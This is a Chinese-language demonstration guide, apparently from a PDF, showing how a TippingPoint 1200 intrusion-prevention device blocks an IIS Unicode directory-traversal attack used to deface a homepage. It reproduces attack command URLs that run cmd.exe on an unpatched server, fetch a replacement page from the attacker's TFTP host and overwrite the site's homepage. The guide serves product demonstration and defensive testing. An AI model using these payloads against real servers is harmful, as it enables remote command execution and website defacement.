TippingPoint对篡改主页攻击防御功能演示操作指导.pdfVIP

TippingPoint对篡改主页攻击防御的功能演示 操作指导 安全产品 赵彪 04708 组网需求： 演示TippingPoint对篡改主页攻击防御的功能。 组网图 TippingPoint1200：TOS Version ：519，Digital Vaccine ：720 ； PC1：WindowsXP、可执行程序 simpleattack.exe（包括一个简单的配置脚 本）、tftp服务器； PC2：没有打补丁的Windows2000Server，安装有IIS服务； PC3：WindowsXP，管理TippingPoint1200。 测试步骤 1、在不加入TippingPoint1200时，验证Unicode攻击： 步骤1：配置PC2 ： 将Google.files和Google.html拷到PC2的Inetpub\wwwroot下，这时IE 可连上去访问； 设置PC2上IIS的默认Web站点的文档的主页面为Google.html; 1 IIS的默认Web站点的主目录的执行许可要设成：脚本和可执行程 序 对NTFS文件系统，需要给wwwroot目录的安全标签页进行修改，改成 Everyone有修改和写入的权限；（另外，wwwroot目录本身的属性肯定要 关注一下，如果只读，肯定需要去掉只读属性；）； 2 步骤2 ：在PC 1 上访问PC2 的Web 服务： 步骤3 ： PC2 的配置： 根据目标机的IP地址修改attack/目录下的attackcmd.txt文件；另外， 3 攻击机里要有tftp服务器程序，还有，在攻击工具的目录下有黑网页，要 被目标机下载；这样就可以黑掉网页了。 attackcmd.txt文件内容： /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+ /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp+-i+ +get+goog le.html /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+d:\inetpub\scripts\googl e.html+d:\inetpub\wwwroot\Google.html / 步骤4 ：在PC 1 上用simpleattack.exe工具攻击PC2 ： 步骤5：PC2 被攻击后，网页内容被修改： 4 2 、加入TippingPoint1200后，验证Unicode攻击： 步骤1：缺省情况下，过滤器1095启用 步骤2 ：PC 1 攻击PC2 ，由于经过了TP 防御，攻击失败 5 步骤3 ：查看Block日志 步骤4 ：查看攻击报告 6 演示关键点 略。 7